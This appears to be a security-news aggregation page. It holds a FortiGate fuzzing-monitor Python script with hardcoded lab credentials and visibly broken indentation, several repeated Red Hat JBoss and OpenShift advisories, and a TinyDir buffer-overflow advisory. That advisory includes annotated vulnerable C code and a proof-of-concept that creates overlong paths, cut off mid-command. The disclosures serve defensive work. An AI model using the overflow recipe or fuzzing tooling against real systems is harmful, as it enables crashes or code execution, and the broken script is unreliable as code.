This is a small extension script to monitor suff.py, or the Simple Universal Fortigate Fuzzer, and to collect crashlogs for future analysis.

#!/usr/bin/env python3  
# suff_monitor.py -- basic monitoring for fuzzing scenarios (suff/burp/mutiny)  
#   
# -- updates --  
# 22.11.2023 @ 02:23 :: shame init version ready to go  
# 21.11.2023 @ 19:18 :: log me if you can  
# 21.11.2023 @ 15:14 :: added: time, sleep, log2fp  
# 21.11.2023 @ 01:19 :: started this lame code  
#   
# idea - run suff_monitor.py against the box you're testing (fgvm):  
# - add time to sleep and date to log updates  
# - log in (so same creds as for suff.py, postauth testing, etc)  
# - get ver/info -> log2file  
# ** (should be ready at this stage, so): **  
#   while true:  
#       check_diag_deb(+log2file,+a)  
#       sleep 1  
#  end_of_file  
#   
# -------------  
#   
# for more details:  
#   https://code610.blogspot.com/2023/12/monitoring-suff.html  
#   https://code610.blogspot.com/2023/04/fuzzing-fortigate-7.html    
#   https://github.com/c610/free/blob/master/suff-v0.1.py  
#   https://github.com/c610/free/blob/master/fg7stack_poc.py  
#   
# 

from netmiko import Netmiko  
import sys,os  
import time  
import paramiko

###################  
##############  
########  
####  
##  
#

fplog = open('saveme.log','+a')

command = 'diag debug crashlog show' # did you enable logs in your FGVM?

def connect_to_crashlog():

         # set up for the target  
    try:

                fw_01 = {  
          'host':'192.168.56.231',  
          'username':'admin',  
          'password':'P@ssw0rd',  
          'device_type':'fortinet',  
          'timeout':3  
          }

        net_connect = Netmiko( **fw_01 )  
        print("+ Connected to FG!")  
        print("+    logfile: savethis.log")

        fplog.write('----starting suff_monitor.py ----\n')  
        fplog.write(net_connect)    
        fplog.write('\n-- results below: --\n')

        # if we're connected: check diag debug crashlog (or any other you'd like to)  
        send_logcheck_cfg = net_connect.send_config_set( command  ) 

                fplog.write(send_logcheck_cfg)  
        fplog.write('\n---- next while loop ----\n')

                print("+ looks like we just sent this command:\n\t%s\n\n" % send_logcheck_cfg )

        print("send_init_cfg finished")

    ## check crashlog finished 

    except paramiko.ssh_exception.SSHException as e:  
        print(" > connection error: %s" % e)

    except ConnectionResetError as e:  
        print("> connection error2: %s" % e)

    except UnboundLocalError as e:  
        print("UnboundLocalError: local variable 'net_connect' referenced before assignment")  
        print("> unbound variable error: %s" % e)

## end of connect_to_crashlog()   
# 

##########  
#### main  
##########

print('y0;[')  
print('starting: connect_to_crashlog()')

while True:

    print('debug: connect_to_crashlog() starting...')

    connect_to_crashlog()

    print("... sleeping 1...")  
    time.sleep(1) 

    print('sleep done. next True iter...')

    ####   
print("finished main()")

Simple Universal Fortigate Fuzzer Extension Script

Red Hat Security Advisory 2023-7641-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7641.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat JBoss Enterprise Application Platform 7.4.14 security update  
Advisory ID:        RHSA-2023:7641-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7641  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-2976  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.14 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.13, and includes bug fixes and enhancements.

See the Red Hat JBoss Enterprise Application Platform 7.4.14 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK (CVE-2023-39410)

* guava: insecure temporary directory creation (CVE-2023-2976)

* eap-galleon: custom provisioning creates unsecured http-invoker (CVE-2023-4503)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* sshd-common: apache-mina-sshd: information exposure in SFTP server implementations (CVE-2023-35887)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-2976

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches&product=appplatform&version=7.4  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/  
https://bugzilla.redhat.com/show_bug.cgi?id=2184751  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2240036  
https://bugzilla.redhat.com/show_bug.cgi?id=2242521  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://issues.redhat.com/browse/JBEAP-25004  
https://issues.redhat.com/browse/JBEAP-25085  
https://issues.redhat.com/browse/JBEAP-25086  
https://issues.redhat.com/browse/JBEAP-25378  
https://issues.redhat.com/browse/JBEAP-25380  
https://issues.redhat.com/browse/JBEAP-25419  
https://issues.redhat.com/browse/JBEAP-25451  
https://issues.redhat.com/browse/JBEAP-25457  
https://issues.redhat.com/browse/JBEAP-25541  
https://issues.redhat.com/browse/JBEAP-25547  
https://issues.redhat.com/browse/JBEAP-25576  
https://issues.redhat.com/browse/JBEAP-25594  
https://issues.redhat.com/browse/JBEAP-25627  
https://issues.redhat.com/browse/JBEAP-25657  
https://issues.redhat.com/browse/JBEAP-25685  
https://issues.redhat.com/browse/JBEAP-25700  
https://issues.redhat.com/browse/JBEAP-25716  
https://issues.redhat.com/browse/JBEAP-25726  
https://issues.redhat.com/browse/JBEAP-25772  
https://issues.redhat.com/browse/JBEAP-25779  
https://issues.redhat.com/browse/JBEAP-25803  
https://issues.redhat.com/browse/JBEAP-25838  
https://issues.redhat.com/browse/JBEAP-26041

Red Hat Security Advisory 2023-7641-03

Red Hat Security Advisory 2023-7639-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7639.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat JBoss Enterprise Application Platform 7.4.14 on RHEL 9 security update  
Advisory ID:        RHSA-2023:7639-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7639  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-2976  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.14 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.13, and includes bug fixes and enhancements.

See the Red Hat JBoss Enterprise Application Platform 7.4.14 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK (CVE-2023-39410)

* guava: insecure temporary directory creation (CVE-2023-2976)

* eap-galleon: custom provisioning creates unsecured http-invoker (CVE-2023-4503)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* sshd-common: apache-mina-sshd: information exposure in SFTP server implementations (CVE-2023-35887)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-2976

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/  
https://bugzilla.redhat.com/show_bug.cgi?id=2184751  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2240036  
https://bugzilla.redhat.com/show_bug.cgi?id=2242521  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://issues.redhat.com/browse/JBEAP-25004  
https://issues.redhat.com/browse/JBEAP-25085  
https://issues.redhat.com/browse/JBEAP-25086  
https://issues.redhat.com/browse/JBEAP-25378  
https://issues.redhat.com/browse/JBEAP-25380  
https://issues.redhat.com/browse/JBEAP-25419  
https://issues.redhat.com/browse/JBEAP-25451  
https://issues.redhat.com/browse/JBEAP-25457  
https://issues.redhat.com/browse/JBEAP-25541  
https://issues.redhat.com/browse/JBEAP-25547  
https://issues.redhat.com/browse/JBEAP-25576  
https://issues.redhat.com/browse/JBEAP-25594  
https://issues.redhat.com/browse/JBEAP-25627  
https://issues.redhat.com/browse/JBEAP-25657  
https://issues.redhat.com/browse/JBEAP-25685  
https://issues.redhat.com/browse/JBEAP-25700  
https://issues.redhat.com/browse/JBEAP-25716  
https://issues.redhat.com/browse/JBEAP-25726  
https://issues.redhat.com/browse/JBEAP-25772  
https://issues.redhat.com/browse/JBEAP-25779  
https://issues.redhat.com/browse/JBEAP-25803  
https://issues.redhat.com/browse/JBEAP-25838  
https://issues.redhat.com/browse/JBEAP-26041

Red Hat Security Advisory 2023-7639-03

Red Hat Security Advisory 2023-7638-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7638.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat JBoss Enterprise Application Platform 7.4.14 on RHEL 8 security update  
Advisory ID:        RHSA-2023:7638-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7638  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-2976  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.14 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.13, and includes bug fixes and enhancements.

See the Red Hat JBoss Enterprise Application Platform 7.4.14 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK (CVE-2023-39410)

* guava: insecure temporary directory creation (CVE-2023-2976)

* eap-galleon: custom provisioning creates unsecured http-invoker (CVE-2023-4503)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* sshd-common: apache-mina-sshd: information exposure in SFTP server implementations (CVE-2023-35887)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-2976

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/  
https://bugzilla.redhat.com/show_bug.cgi?id=2184751  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2240036  
https://bugzilla.redhat.com/show_bug.cgi?id=2242521  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://issues.redhat.com/browse/JBEAP-25004  
https://issues.redhat.com/browse/JBEAP-25085  
https://issues.redhat.com/browse/JBEAP-25086  
https://issues.redhat.com/browse/JBEAP-25378  
https://issues.redhat.com/browse/JBEAP-25380  
https://issues.redhat.com/browse/JBEAP-25419  
https://issues.redhat.com/browse/JBEAP-25451  
https://issues.redhat.com/browse/JBEAP-25457  
https://issues.redhat.com/browse/JBEAP-25541  
https://issues.redhat.com/browse/JBEAP-25547  
https://issues.redhat.com/browse/JBEAP-25576  
https://issues.redhat.com/browse/JBEAP-25594  
https://issues.redhat.com/browse/JBEAP-25627  
https://issues.redhat.com/browse/JBEAP-25657  
https://issues.redhat.com/browse/JBEAP-25685  
https://issues.redhat.com/browse/JBEAP-25700  
https://issues.redhat.com/browse/JBEAP-25716  
https://issues.redhat.com/browse/JBEAP-25726  
https://issues.redhat.com/browse/JBEAP-25772  
https://issues.redhat.com/browse/JBEAP-25779  
https://issues.redhat.com/browse/JBEAP-25803  
https://issues.redhat.com/browse/JBEAP-25838  
https://issues.redhat.com/browse/JBEAP-26041

Red Hat Security Advisory 2023-7638-03

Red Hat Security Advisory 2023-7637-03 - An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7637.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat JBoss Enterprise Application Platform 7.4.14 on RHEL 7 security update  
Advisory ID:        RHSA-2023:7637-03  
Product:            Red Hat JBoss Enterprise Application Platform  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7637  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-2976  
====================================================================

Summary: 

An update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.

This release of Red Hat JBoss Enterprise Application Platform 7.4.14 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.13, and includes bug fixes and enhancements.

See the Red Hat JBoss Enterprise Application Platform 7.4.14 Release Notes for information about the most significant bug fixes and enhancements included in this release.

Security Fix(es):

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* avro: apache-avro: Apache Avro Java SDK: Memory when deserializing untrusted data in Avro Java SDK (CVE-2023-39410)

* guava: insecure temporary directory creation (CVE-2023-2976)

* eap-galleon: custom provisioning creates unsecured http-invoker (CVE-2023-4503)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* sshd-common: apache-mina-sshd: information exposure in SFTP server implementations (CVE-2023-35887)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2023-2976

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/  
https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/  
https://bugzilla.redhat.com/show_bug.cgi?id=2184751  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2240036  
https://bugzilla.redhat.com/show_bug.cgi?id=2242521  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://issues.redhat.com/browse/JBEAP-25004  
https://issues.redhat.com/browse/JBEAP-25085  
https://issues.redhat.com/browse/JBEAP-25086  
https://issues.redhat.com/browse/JBEAP-25378  
https://issues.redhat.com/browse/JBEAP-25380  
https://issues.redhat.com/browse/JBEAP-25419  
https://issues.redhat.com/browse/JBEAP-25451  
https://issues.redhat.com/browse/JBEAP-25457  
https://issues.redhat.com/browse/JBEAP-25541  
https://issues.redhat.com/browse/JBEAP-25547  
https://issues.redhat.com/browse/JBEAP-25576  
https://issues.redhat.com/browse/JBEAP-25594  
https://issues.redhat.com/browse/JBEAP-25627  
https://issues.redhat.com/browse/JBEAP-25657  
https://issues.redhat.com/browse/JBEAP-25685  
https://issues.redhat.com/browse/JBEAP-25700  
https://issues.redhat.com/browse/JBEAP-25716  
https://issues.redhat.com/browse/JBEAP-25726  
https://issues.redhat.com/browse/JBEAP-25772  
https://issues.redhat.com/browse/JBEAP-25779  
https://issues.redhat.com/browse/JBEAP-25803  
https://issues.redhat.com/browse/JBEAP-25838  
https://issues.redhat.com/browse/JBEAP-26041

Red Hat Security Advisory 2023-7637-03

Red Hat Security Advisory 2023-7599-03 - Red Hat OpenShift Container Platform release 4.14.5 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7599.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.14.5 bug fix and security update  
Advisory ID:        RHSA-2023:7599-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7599  
Issue date:         2023-12-05  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.5 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.14.

Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.5. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2023:7603

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://issues.redhat.com/browse/OCPBUGS-10126  
https://issues.redhat.com/browse/OCPBUGS-22286  
https://issues.redhat.com/browse/OCPBUGS-22363  
https://issues.redhat.com/browse/OCPBUGS-22430  
https://issues.redhat.com/browse/OCPBUGS-23426  
https://issues.redhat.com/browse/OCPBUGS-23490  
https://issues.redhat.com/browse/OCPBUGS-23751  
https://issues.redhat.com/browse/OCPBUGS-23906

Red Hat Security Advisory 2023-7599-03

TinyDir versions 1.2.5 and below suffer from a buffer overflow vulnerability with long path names.

--[ HNS-2023-04 - HN Security Advisory - https://security.humanativaspa.it/

* Title: Buffer overflow vulnerabilities with long path names in TinyDir  
* Product: TinyDir <= 1.2.5  
* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it>  
* Date: 2023-12-04  
* CVE ID: CVE-2023-49287  
* Severity: High - 7.7 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H  
* Vendor URL: https://github.com/cxong/tinydir  
* Advisory URL: https://github.com/cxong/tinydir/security/advisories/GHSA-jf5r-wgf4-qhxf

--[ 0 - Table of contents

1 - Summary  
2 - Background  
3 - Vulnerabilities  
4 - Proof of concept  
5 - Affected products  
6 - Remediation  
7 - Disclosure timeline  
8 - Acknowledgements  
9 - References

--[ 1 - Summary

"This is the OG we all want to be, congrats on 20yrs of (public) vulns!"  
                                                         -- Erik Cabetas

TinyDir is a lightweight, portable and easy to integrate C directory and  
file reader. It wraps dirent for POSIX and FindFirstFile for Windows.

We reviewed TinyDir's source code hosted on GitHub [1] and identified some  
security vulnerabilities that may cause memory corruption. Their impacts  
range from denial of service to potential arbitrary code execution.

--[ 2 - Background

While auditing another codebase, we noticed that it included TinyDir.  
Since this small but successful project is used in hundreds of repositories  
[2], we decided to review it in search of security bugs.

--[ 3 - Vulnerabilities

We spotted some buffer overflow vulnerabilities with long path names in the  
tinydir_file_open() function, at the marked locations in the following  
source code listing:

```c  
/* Open a single file given its path */  
_TINYDIR_FUNC  
int tinydir_file_open(tinydir_file *file, const _tinydir_char_t *path)  
{  
  tinydir_dir dir;  
  int result = 0;  
  int found = 0;  
  _tinydir_char_t dir_name_buf[_TINYDIR_PATH_MAX];  
  _tinydir_char_t file_name_buf[_TINYDIR_FILENAME_MAX];  
  _tinydir_char_t *dir_name;  
  _tinydir_char_t *base_name;  
#if (defined _MSC_VER || defined __MINGW32__)  
  _tinydir_char_t drive_buf[_TINYDIR_PATH_MAX];  
  _tinydir_char_t ext_buf[_TINYDIR_FILENAME_MAX];  
#endif

  if (file == NULL || path == NULL || _tinydir_strlen(path) == 0)  
  {  
    errno = EINVAL;  
    return -1;  
  }  
  if (_tinydir_strlen(path) + _TINYDIR_PATH_EXTRA >= _TINYDIR_PATH_MAX)  
  {  
    errno = ENAMETOOLONG;  
    return -1;  
  }

  /* Get the parent path */  
#if (defined _MSC_VER || defined __MINGW32__)  
#if ((defined _MSC_VER) && (_MSC_VER >= 1400))  
  errno = _tsplitpath_s(  
    path,  
    drive_buf, _TINYDIR_DRIVE_MAX,  
    dir_name_buf, _TINYDIR_FILENAME_MAX,  
    file_name_buf, _TINYDIR_FILENAME_MAX,  
    ext_buf, _TINYDIR_FILENAME_MAX);  
#else  
  _tsplitpath(  
    path,  
    drive_buf,  
    dir_name_buf,  
    file_name_buf,  
    ext_buf); /* VULN: potential buffer overflow due to insecure splitpath() API  
                             (https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170) */  
#endif

  if (errno)  
  {  
    return -1;  
  }

/* _splitpath_s not work fine with only filename and widechar support */  
#ifdef _UNICODE  
  if (drive_buf[0] == L'\xFEFE')  
    drive_buf[0] = '\0';  
  if (dir_name_buf[0] == L'\xFEFE')  
    dir_name_buf[0] = '\0';  
#endif

  /* Emulate the behavior of dirname by returning "." for dir name if it's  
  empty */  
  if (drive_buf[0] == '\0' && dir_name_buf[0] == '\0')  
  {  
    _tinydir_strcpy(dir_name_buf, TINYDIR_STRING("."));  
  }  
  /* Concatenate the drive letter and dir name to form full dir name */  
  _tinydir_strcat(drive_buf, dir_name_buf);  
  dir_name = drive_buf;  
  /* Concatenate the file name and extension to form base name */  
  _tinydir_strcat(file_name_buf, ext_buf); /* VULN: since sizeof(file_name_buf) + sizeof(ext_buf) is larger than  
                                                    sizeof(file_name_buf), we have a potential stack buffer overflow */  
  base_name = file_name_buf;  
#else  
  _tinydir_strcpy(dir_name_buf, path);  
  dir_name = dirname(dir_name_buf);  
  _tinydir_strcpy(file_name_buf, path); /* VULN: since sizeof(file_name_buf) is smaller than the maximum path length,   
                                                 we have a potential stack buffer overflow */  
  base_name = basename(file_name_buf);  
#endif

  /* Special case: if the path is a root dir, open the parent dir as the file */  
#if (defined _MSC_VER || defined __MINGW32__)  
  if (_tinydir_strlen(base_name) == 0)  
#else  
  if ((_tinydir_strcmp(base_name, TINYDIR_STRING("/"))) == 0)  
#endif  
  {  
    memset(file, 0, sizeof * file);  
    file->is_dir = 1;  
    file->is_reg = 0;  
    _tinydir_strcpy(file->path, dir_name);  
    file->extension = file->path + _tinydir_strlen(file->path);  
    return 0;  
  }

  /* Open the parent directory */  
  if (tinydir_open(&dir, dir_name) == -1)  
  {  
    return -1;  
  }

  /* Read through the parent directory and look for the file */  
  while (dir.has_next)  
  {  
    if (tinydir_readfile(&dir, file) == -1)  
    {  
      result = -1;  
      goto bail;  
    }  
    if (_tinydir_strcmp(file->name, base_name) == 0)  
    {  
      /* File found */  
      found = 1;  
      break;  
    }  
    tinydir_next(&dir);  
  }  
  if (!found)  
  {  
    result = -1;  
    errno = ENOENT;  
  }

bail:  
  tinydir_close(&dir);  
  return result;  
}  
```

--[ 4 - Proof of concept

Step-by-step instructions to replicate the third vulnerability on Linux:

```  
$ git clone https://github.com/cxong/tinydir  
$ cd tinydir/samples/  
$ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample  
$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/  
